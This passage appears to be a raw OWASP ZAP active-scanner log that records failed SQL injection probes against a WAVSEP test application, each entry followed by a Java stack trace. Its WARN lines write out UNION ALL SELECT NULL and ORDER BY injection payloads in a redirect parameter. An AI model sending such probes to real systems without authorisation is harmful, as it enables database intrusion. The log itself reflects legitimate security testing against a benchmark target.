org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681908 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com' UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com' UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681909 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681909 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681911 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681911 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681912 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681913 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 5911#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 5911# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681913 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681914 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681915 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681916 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681916 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681917 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com%' ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com%' ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at 